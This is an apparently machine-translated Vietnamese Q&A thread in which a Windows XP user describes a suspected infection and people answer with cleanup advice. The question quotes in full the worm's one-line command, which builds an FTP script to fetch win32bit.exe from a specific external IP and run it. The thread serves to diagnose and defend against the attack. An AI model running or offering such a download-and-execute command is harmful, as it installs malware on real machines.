Hệ thống của tôi đang hoạt động kỳ lạ, liệu tôi có thể bị nhiễm virus không?


1

Trong hai ngày qua, tôi gặp phải một hành vi kỳ lạ trong máy tính mà tôi cực kỳ nghi ngờ là vi-rút. Thật bất ngờ, một loạt các sự kiện bàn phím tham gia. Nó cố gắng mở dấu nhắc lệnh và thử thực thi dòng sau: del eq&echo open 186.81.185.135 14062 >> eq&echo user 12120 17227 >> eq &echo get win32bit.exe >> eq &echo quit >> eq &ftp -n -s:eq &win32bit.exe &del eq Đó là Win XP SP3 tôi đang hoạt động và tôi có McAfee đang chạy. Có ai có ý tưởng gì về điều đó không?

Câu trả lời:


4

Chạy Malwarebytes Anti-Malware. Bạn có thể lấy nó ở đây . Bạn có thể loại bỏ nó với điều đó. Nếu không thì định dạng và tải lại là cách nhanh nhất, dễ dàng để dọn sạch hệ thống. Bên cạnh đó, tải lại tốt mỗi giờ và giữ cho hệ điều hành chạy tốt. Mong rằng sẽ giúp.


Ngoài ra, nếu các malwarebytes từ chối cài đặt, rất có khả năng hệ thống thực sự có virus.
Journeyman Geek

2

nếu máy quét vi-rút thông thường của bạn không nhận được mối đe dọa (được biết hoặc chưa biết) thì điều đó không có nghĩa là nó không có thật. cho ThreatFire thử, một chương trình anitvirus mà không dựa vào chữ ký virus nhưng trên phân tích hành vi


ooh tôi thích cái tên này
Kez

1

Tôi muốn giới thiệu Spybot Tìm kiếm & Tiêu diệt.

Kiểm tra xem lưu lượng mạng của bạn đang làm gì. Bạn có thể sử dụng điều đó để tìm hiểu xem đó là phiên từ xa hay trojan hoạt động từ xa.

Bạn cũng có thể theo dõi chương trình thực thi nào đang chạy trong Trình quản lý tác vụ của mình dựa trên Read Byte và Write Byte. Đó là cách tôi bắt lỗi trên hệ thống của mình.


1

Vâng, bạn đã bị xâm phạm. Nếu bạn không có chuyên môn để chẩn đoán và sửa chữa đầy đủ trojan và rootkit, cách duy nhất an toàn để tiến hành là cài đặt lại HĐH. Chúc vui vẻ.

Các công cụ chống vi-rút ngày nay không phụ thuộc vào công việc bảo vệ bạn khỏi sự biến đổi lớn và nhanh chóng của các mối đe dọa phổ biến hiện nay. Đặc biệt là các máy quét dựa trên chữ ký truyền thống là khá nhiều vô dụng. Đừng tin rằng máy của bạn sạch chỉ vì có một biểu tượng nhỏ yên tâm ngồi trong khay hệ thống của bạn và ăn hết một nửa CPU của bạn.


1

Ngày nay, địa chỉ IP này dường như rất năng động, có vẻ kỳ quặc cho mục đích của nó.

$ đào -x 186.81.185.135
[..]
135.185.81.186.in-addr.arpa. 86400 IN PTR Dynamic-IP-18681185135.cable.net.co.
[..]

Tuy nhiên, điều này thực tế có thể khá cũ , vậy trình quét virus của bạn có thực sự đang chạy không ...?

EDIT : ngày hôm qua, tìm kiếm 186.81.185.135 chỉ cho 1 kết quả, hôm nay 2 (cộng với câu hỏi về Siêu người dùng này) ... Có lẽ khá gần đây?


0

Có lẽ bạn đã thiết lập VNC phải không? Và hầu hết có lẽ bạn chưa thiết lập mật khẩu cho nó, phải không? Đây là cách sâu cố gắng vào máy tính của bạn. Máy chủ lưu trữ 186.81.185.135 không liên quan vì rất có thể đó là một người nghèo khác đã không thiết lập VNC đúng cách.

Con sâu cố gắng tạo một tập lệnh cho ftp để tải xuống win32bit.exe và chạy nó khi nó sẵn sàng.

Chạy một số loại máy quét chống ... được khuyến khích vì khó xác định liệu nó có thành công hay không.


0

Hệ thống của bạn có được cập nhật theo chiều dọc không? Sẽ không hại gì khi đảm bảo bạn đã nhận được tất cả những gì mới nhất và tốt nhất từ ​​Microsoft, bao gồm cả công cụ Loại bỏ phần mềm độc hại trong tháng này. Nó có thể tìm và loại bỏ những gì bạn có. Tất cả các công cụ phần mềm gián điệp được chú ý ở trên cũng là các tùy chọn tuyệt vời (tôi thích Malwarebytes)

Khi sử dụng trang web của chúng tôi, bạn xác nhận rằng bạn đã đọc và hiểu Chính sách cookieChính sách bảo mật của chúng tôi.
Licensed under cc by-sa 3.0 with attribution required.